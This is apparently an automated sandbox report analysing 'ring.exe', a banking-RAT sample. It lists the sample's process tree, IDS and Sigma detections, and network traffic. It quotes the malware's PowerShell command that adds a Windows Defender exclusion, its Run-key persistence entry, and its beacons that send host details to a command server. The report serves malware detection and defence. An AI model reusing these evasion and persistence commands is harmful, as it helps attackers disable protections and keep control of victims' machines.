Edit tour

Windows Analysis Report
ring.exe

Overview

General Information

Sample name:	ring.exe
Analysis ID:	1558818
MD5:	dec85de31c5a9e3754ab0fcfed8a3e79
SHA1:	b47c8f4918518f1538842b5b12bc5dcbea5c3d59
SHA256:	fa4f6da9ea8aca025d129328ce57b36343a1bc8796d1846d02157d2242f904a8
Tags:	154-205-156-20api-computadoratualizacao-comexemesh-computadoratualizacao-comuser-johnk3r
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Opens network shares

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

ring.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)

cmd.exe (PID: 2460 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2928 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

WmiPrvSE.exe (PID: 7272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

ring.exe (PID: 7464 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)

ring.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Roaming\Win_24230\ring.exe" MD5: DEC85DE31C5A9E3754AB0FCFED8A3E79)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ring.exe", ParentImage: C:\Users\user\Desktop\ring.exe, ParentProcessId: 6300, ParentProcessName: ring.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2460, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Win_24230\ring.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ring.exe, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinSesp

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'", ProcessId: 2928, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE KL-Remote / Cryp_Banker14 RAT connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T20:36:17.886678+0100	2020315	1	A Network Trojan was detected	192.168.2.7	49707	24.152.39.13	55417	TCP

ET MALWARE KL-Remote / Cryp_Banker14 RAT response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-19T20:36:18.601634+0100	2020316	1	A Network Trojan was detected	24.152.39.13	55417	192.168.2.7	49707	TCP

Joe Sandbox Signatures

• AV Detection
• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Boot Survival
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection
• Stealing of Sensitive Information

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe

ReversingLabs: Detection: 18%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 92.8% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ring.exe

Joe Sandbox ML: detected

Source: ring.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ring.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2020315 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT connection : 192.168.2.7:49707 -> 24.152.39.13:55417
Source: Network traffic	Suricata IDS: 2020316 - Severity 1 - ET MALWARE KL-Remote / Cryp_Banker14 RAT response : 24.152.39.13:55417 -> 192.168.2.7:49707

Source: global traffic

TCP traffic: 192.168.2.7:49705 -> 24.152.39.13:55417

Source: Joe Sandbox View

IP Address: 104.237.62.213 104.237.62.213

Source: Joe Sandbox View

ASN Name: MasterDaWebBR MasterDaWebBR

Source: unknown

DNS query: name: api64.ipify.org

Source: global traffic

HTTP traffic detected: GET /?format=text HTTP/1.1Host: api64.ipify.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	TCP traffic detected without corresponding DNS query: 154.205.156.20
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?format=text HTTP/1.1Host: api64.ipify.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global traffic	HTTP traffic detected: GET /Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28Build%2019045%29%20&ultima_atualizacao=2024-11-19&plugin_instalado=Plugin%20A&status=Instalada&ip=8.46.123.75 HTTP/1.1User-Agent: Delphi 5.xHost: 154.205.156.20Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: adsklbb.org

Source: ring.exe, ring.exe.4.dr	String found in binary or memory: http://154.205.156.20/Painel/atualiza_update.php
Source: ring.exe, ring.exe.4.dr	String found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php
Source: ring.exe, 00000004.00000002.2527929541.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp, ring.exe, 00000004.00000002.2529177771.000000000366D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://154.205.156.20/Painel/atualizar_dados.php?nome_pc=960781&versao_windows=Windows%2010.0%20%28B
Source: ring.exe, ring.exe.4.dr	String found in binary or memory: http://api64.ipify.org/?format=text
Source: ring.exe, ring.exe.4.dr	String found in binary or memory: http://www.indyproject.org/

Source: ring.exe.4.dr	Static PE information: Number of sections : 11 > 10
Source: ring.exe	Static PE information: Number of sections : 11 > 10

Source: ring.exe, 00000004.00000002.2527929541.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ring.exe

Source: ring.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal84.spyw.evad.winEXE@9/9@2/3

Source: C:\Users\user\Desktop\ring.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\atualizar_dados[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\ring.exe	Mutant created: \Sessions\1\BaseNamedObjects\kkdiiii

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kecezh5z.vbm.ps1

Jump to behavior

Source: C:\Users\user\Desktop\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ring.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ring.exe	String found in binary or memory: NATS-SEFI-ADD
Source: ring.exe	String found in binary or memory: NATS-DANO-ADD
Source: ring.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: ring.exe	String found in binary or memory: jp-ocr-b-add
Source: ring.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: ring.exe	String found in binary or memory: jp-ocr-hand-add
Source: ring.exe	String found in binary or memory: ISO_6937-2-add

Source: C:\Users\user\Desktop\ring.exe

File read: C:\Users\user\Desktop\ring.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ring.exe "C:\Users\user\Desktop\ring.exe"
Source: C:\Users\user\Desktop\ring.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Win_24230\ring.exe "C:\Users\user\AppData\Roaming\Win_24230\ring.exe"
Source: C:\Users\user\Desktop\ring.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Win_24230\ring.exe'"	Jump to behavior

Source: C:\Users\user\Desktop\ring.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: vboxhook.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ring.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Win_24230\ring.exe	Section loaded: idndl.dll	Jump to behavior
